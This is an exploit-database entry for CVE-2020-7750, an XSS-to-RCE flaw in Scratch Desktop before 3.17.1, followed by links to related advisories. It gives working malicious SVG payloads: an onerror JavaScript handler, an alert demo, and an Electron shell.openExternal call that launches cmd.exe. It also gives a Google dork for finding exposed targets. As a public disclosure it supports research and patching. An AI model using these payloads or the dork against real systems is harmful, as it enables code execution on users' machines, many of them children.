Lucene search
Stig Magnus Baugst1337DAY-ID-36500HistoryJul 02, 2021 - 12:00 a.m.
Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution Vulnerabilities
2021-07-0200:00:00
Stig Magnus Baugst
0day.today
69
0.006 Low
EPSS
Percentile
78.3%
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Exploit Author: Stig Magnus BaugstΓΈ
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
Example of regular cross-site scripting (XSS):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>
The example above launches cmd.exe (Command Prompt) on Windows.
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
Related
prion
prion
Code injection
2020-10-21 17:15:00
cvelist
cvelist
CVE-2020-7750 Cross-site Scripting (XSS)
2020-10-21 00:00:00
osv
osv
Cross-Site Scripting in scratch-svg-renderer
2020-11-09 14:21:17
CVE-2020-7750
2020-10-21 17:15:13
nvd
nvd
CVE-2020-7750
2020-10-21 17:15:13
nodejs
nodejs
Cross-Site Scripting in scratch-svg-renderer
2020-11-09 14:24:31
githubexploit
githubexploit
Exploit for Cross-site Scripting in Mit Scratch-Svg-Renderer
2020-12-08 13:40:01
github
github
Cross-Site Scripting in scratch-svg-renderer
2020-11-09 14:21:17
packetstorm
packetstorm
Scratch Desktop 3.17 Code Execution / Cross Site Scripting
2021-07-02 00:00:00
cve
cve
CVE-2020-7750
2020-10-21 17:15:13
exploitdb
exploitdb
Scratch Desktop 3.17 - Remote Code Execution
2021-07-02 00:00:00